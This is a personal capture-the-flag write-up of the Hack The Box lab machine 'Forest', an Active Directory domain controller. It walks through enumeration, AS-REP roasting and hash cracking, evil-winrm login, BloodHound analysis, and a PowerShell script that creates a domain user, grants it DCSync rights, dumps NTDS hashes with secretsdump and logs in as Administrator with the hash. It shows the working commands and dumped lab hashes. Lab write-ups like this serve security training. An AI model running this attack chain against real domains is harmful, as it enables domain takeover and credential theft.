Forest

Let's start off with nmap: 

nmap -sC -sV -oA nmap/ -T4 10.129.95.210

Results:

Nmap scan report for 10.129.95.210
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-13 13:18:08Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m10s, median: 6m49s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-01-13T13:18:14
|_  start_date: 2023-01-13T13:14:57
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2023-01-13T05:18:15-08:00

Ports 53 and 88 are open which indicates that we are dealing with Active Directory and a Domain Controller to be more specific! Also, we get a domain name: htb.local.

Null sessions are not enabled on target but we can do some enumerating via rpc using rpcclient!

rpcclient -U "" -N 10.129.95.210

There is alot of interesting info we can query via rpcclient: 

enumdomusers

enumdomusers

Users are all we need but we also could use commands like 

enumdomgroups

To get list of all the groups and their RID:s,

querygroupmem <RID>

To list users of a specific group and

queryuser <RID>

To show more detailed info of user!

Next step is to see what we can do with just usernames, one technique is AS-REP Roasting which is basically a feature of Kerberos that when Kerberos preauthentication disabled anyone can query (AS-REP) message that contains a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future access requests by the user. Good article on this can be found here

This can be exploited with impacket-script GetNPUsers.py. Before running add users found before to users.txt file and then run:

GetNPUsers.py htb.local/ -dc-ip 10.129.95.210 -usersfile users.txt -format hashcat -outputfile hashes.txt

getnpusers

Output lists us users that the method didn't work but we get one hash on our file hashes.txt! Next step is to crack that in hashcat:

./hashcat.exe hashes.txt rockyou.txt

And we get user svc-alfresco password! Which is 's3rvice'.

Next step is to login to the box using evil-winrm:

evil-winrm -u svc-alfresco -p s3rvice -i 10.129.95.210

evil-winrm-svc-acoount

We get in! Next let's enumerate the machine using Bloodhound! With Evil-WinRM we can directly download/upload files in addittion to executing powershell commands. Let's upload SharpHound.ps1 to the machine: 

upload SharpHound.ps1

sharphound

After uploading the file first import it's functions by running:

. ./SharpHound.ps1

Now we can call functions on the Evil-WinRM/Powershell session. Let's run the default gathering function:

Invoke-BloodHound -CollectionMethod All

This command generates a zip file on the same folder you run it. Let's download the file:

download 20230113103531_BloodHound.zip

Next, let's open bloodhound and import the zip file and start enumerating.

Our target is Domain Admin so let's use one of Bloodhound's default analysis paths:

bloodhound-initial

The initial result gives a path that I didn't manage to execute, so let's remove it:

bloodhound-correction

The great thing about Bloodhound is that when it manages to give a correct path, it even tells us which tools we could try to use and powershell commands! I'm not going to paste the Bloodhound instructions but you can check the steps from the images below:

bloodhound-1

bloodhound-2

Basically, our user svc-alfresco group is member of service accounts-group which is member of privileged it accounts-group which is member of Account operators-group which has full access to Exchange windows permission-group which have permissions to modify the DACL (Discretionary Access Control List) on the domain. So, what we need to do is add our current user to Exchange Windows Permission Group and then add the same user to DACL.

To do this first we need to download powerview.ps1 and upload it to the machine using Evil-WinRM.

upload-powerview

Next, create a file script.ps1 with contents:

Import-Module .\powerview.ps1
net user zolaboo password /add /domain
net group "Exchange Windows Permissions" /add zolaboo
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\zolaboo', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'zolaboo' -TargetIdentity 'DC=htb,DC=local' -Rights DCSync

This script loads powerview functions, creates a new user and adds it to group, after that it grants it DCSync rights.

Upload it to the machine:

upload-script

Next, run the script with 

./script.ps1

Now run secretsdump on your attack machine:

secretsdump.py zolaboo:password@10.129.95.210

And we get hashes!

joonas@joonas-VirtualBox:~/Documents/htb/forest$ secretsdump.py zolaboo:password

@10.129.95.210                                                                  

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation                                                                                                        

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_deni

ed                                                                              

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                   [*] Using the DRSUAPI method to get NTDS.DIT secrets                            

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d

32c72a07ceea6:::                                                                

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8::: 

DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0

89c0:::                                                                         

htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::   
...

With Adminstrator NTLM hash we can login to the machine as admin using Evil-WinRM!

evil-winrm -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -i 10.129.95.210

root

To be continued